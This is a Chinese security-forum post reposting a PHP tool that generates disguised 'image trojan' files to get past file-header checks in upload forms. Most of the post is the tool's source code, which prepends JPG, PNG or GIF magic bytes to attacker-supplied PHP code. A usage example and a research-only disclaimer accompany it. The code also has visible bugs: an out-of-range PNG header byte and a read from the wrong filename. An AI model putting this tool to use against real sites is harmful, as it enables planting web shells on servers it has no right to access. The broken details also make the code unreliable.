安全矩阵

 找回密码
 立即注册
搜索
查看: 876|回复: 0

关于上传漏洞绕过文件头校验的利用工具

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-9-13 20:04:13 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2022-9-13 20:03 编辑


关于上传漏洞绕过文件头校验的利用工具
原文链接:关于上传漏洞绕过文件头校验的利用工具
youyou-pm10 web安全工具库 2022-09-13 00:00 发表于河南
项目作者:youyou-pm10
项目地址:https://github.com/youyou-pm10/upload-exp

0x01 工具介绍

本脚本用于bypass文件头校验,支持jpg|png|gif格式文件。
0x02 安装与使用

在环境的地址栏输入type参数,填入你想要的类型,再输入cmd参数,填入你想要的php代码,允许不输入cmd,默认采用phpinfo,以便探测图片马能否正常使用。type和cmd都可以用get/post方式传入。
例如:
?type=jpg
回显:
创建成功!文件内容:
ÿØ<?php phpinfo();?>
0x03 源码文件
  1. <!DOCTYPE html>
  2. <head>
  3.     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  4.     <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" />
  5. </head>
  6. </html>
  7. <?php
  8. $cmd = '<?php phpinfo();?>';
  9. // 读取输入的命令
  10. if(!empty($_REQUEST['cmd'])){
  11.     $cmd=$_REQUEST['cmd'];
  12. }
  13. // 输入产生文件的类型
  14. function makeTrick($typeCode){
  15.     switch($typeCode){
  16.         case 'jpg':
  17.             $fileType = Array(255,216);
  18.             break;
  19.         case 'png':
  20.             $fileType = Array(137,800);
  21.             break;
  22.         case 'gif':
  23.             $fileType = Array(71,73);
  24.             break;
  25.         default:
  26.             $fileType = Null;
  27.     }
  28.     return $fileType;
  29. }
  30. function load($fileType,$cmd, $ext){
  31.     // 读取输入的文件类型
  32.     if(!empty($fileType)) {
  33.         $data = pack('C2', $fileType[0], $fileType[1]);
  34.         $file = fopen('profile'.$ext, "wb");
  35.         // 写入文件头
  36.         $bin = fwrite($file, $data);
  37.         // 写入命令
  38.         $bin2 = fwrite($file, $cmd);
  39.         fclose($file);
  40.         $file = fopen('profile'.$ext, "r");
  41.         echo '创建成功!文件内容:</br>';
  42.         echo htmlentities(fread($file, filesize('tmp_pack.txt')));
  43.         fclose($file);
  44.     }
  45. }
  46. if(!empty($_REQUEST['type'])) {
  47.     $ext = $_REQUEST['type'];
  48.     $fileType = makeTrick($ext);
  49.     load($fileType, $cmd, $ext);
  50. }else{
  51.     echo '请用get方式输入type参数和cmd参数(可选,默认phpinfo)';
  52. }
复制代码


0x04 声明

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-20 18:26 , Processed in 0.013431 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表